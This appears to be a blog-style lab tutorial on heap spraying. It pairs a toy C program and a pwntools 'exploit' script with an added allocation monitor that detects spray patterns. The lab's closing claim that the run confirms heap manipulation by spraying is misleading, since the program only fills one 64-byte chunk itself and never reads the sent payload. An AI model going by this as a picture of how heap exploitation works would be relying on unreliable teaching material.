
Heap Spray Techniques Lab

woddlwoddl 2024. 5. 8. 02:02

In this lab, we will manipulate the heap with heap spray techniques to facilitate exploitation.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create the C program that plays the vulnerable target in this lab. It allocates a single 64-byte chunk on the heap and fills it with 'A' bytes to simulate a heap spray.


  #include <stdio.h>
  #include <stdlib.h>

  void vulnerable_function() {
      // One 64-byte heap chunk; the "spray" is simulated by the program
      // itself, which fills the chunk with a repeated byte. No input is read.
      char *ptr = (char *)malloc(64);
      if (ptr != NULL) {
          // Simulate heap spray: fill the whole chunk with 'A'
          for (int i = 0; i < 64; i++) {
              ptr[i] = 'A';
          }
          printf("Heap spray completed.\n");
          free(ptr);
      }
  }

  int main() {
      vulnerable_function();
      return 0;
  }


Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to perform heap spraying.


  from pwn import *

  # Path to the binary built in step 1
  binary_path = './vulnerable'

  # Payload for heap spraying: 64 'A' bytes, the same pattern the program writes.
  # Note: vulnerable.c never reads stdin, so the target does not consume this data;
  # the heap fill in this lab is performed by the program's own loop.
  payload = b'A' * 64

  # Launch the target, send the payload and read its status line
  p = process(binary_path)
  p.send(payload)
  print(p.recvline().decode().strip())  # "Heap spray completed."
  p.close()


Explanation of the Python script:

  • We specify the path to the vulnerable binary and build a payload of 64 'A' bytes, the same pattern used to spray the heap.
  • We launch the vulnerable binary and send the payload. Since the program reads no input, the bytes are not consumed; the heap fill itself happens in the program's own loop.
  • We read and print the line the program writes when the heap spray is complete.

3. Exploiting the Vulnerability:

Save the script as exploit.py and execute it to perform the heap spraying:

$ python exploit.py

Once executed, you should see the line "Heap spray completed.", confirming that the target ran and filled its heap chunk with the spray pattern, i.e. that the heap was manipulated using the heap spray technique.
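As an added example (not part of the lab or its code), here is a small allocation monitor in C that implements the heuristic many heap-spray mitigations rely on: flag a long run of same-size allocations filled with one repeated byte, which is exactly the pattern this lab's 64 x 'A' chunks produce, while varied program data is left alone. The threshold SPRAY_MIN_RUN, the struct and the function names are constructed for this example.

```c
#include <stdbool.h>
#include <stdlib.h>

/* Constructed threshold: this many consecutive same-size chunks filled with one
   repeated byte is reported as a spray; real monitors tune this per workload. */
#define SPRAY_MIN_RUN 32

typedef struct { size_t last_size; unsigned char last_byte; unsigned run; } spray_monitor;

/* True if every byte of buf equals buf[0], as with the lab's 64 x 'A'. */
static bool is_uniform(const unsigned char *buf, size_t len) {
    for (size_t i = 1; i < len; i++)
        if (buf[i] != buf[0]) return false;
    return len > 0;
}

/* Feed one freshly filled allocation to the monitor; true while the current run
   of uniform, same-size, same-byte chunks has reached SPRAY_MIN_RUN. */
bool monitor_observe(spray_monitor *m, const void *buf, size_t len) {
    const unsigned char *b = buf;
    bool uniform = is_uniform(b, len);
    if (uniform && m->run > 0 && len == m->last_size && b[0] == m->last_byte)
        m->run++;
    else
        m->run = uniform ? 1 : 0;
    m->last_size = len;
    m->last_byte = uniform ? b[0] : 0;
    return m->run >= SPRAY_MIN_RUN;
}

/* Repeat the lab's malloc-and-fill loop `count` times and return how many
   allocations the monitor flagged; uniform_fill=false writes varying bytes
   instead, standing in for ordinary program data. */
unsigned run_workload(size_t count, size_t size, unsigned char fill, bool uniform_fill) {
    spray_monitor m = {0};
    unsigned char **chunks = calloc(count, sizeof *chunks);
    unsigned flagged = 0;
    for (size_t i = 0; chunks && i < count; i++) {
        if (!(chunks[i] = malloc(size))) break;
        for (size_t j = 0; j < size; j++)
            chunks[i][j] = uniform_fill ? fill : (unsigned char)(i + j);
        if (monitor_observe(&m, chunks[i], size)) flagged++;
    }
    for (size_t i = 0; chunks && i < count; i++) free(chunks[i]);
    free(chunks);
    return flagged;
}
```

With 100 chunks of 64 'A' bytes the monitor starts flagging at the 32nd allocation and reports 69 hits, while 100 chunks of varied data produce none; a single 64-byte chunk, as in the lab program, stays well below the threshold.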
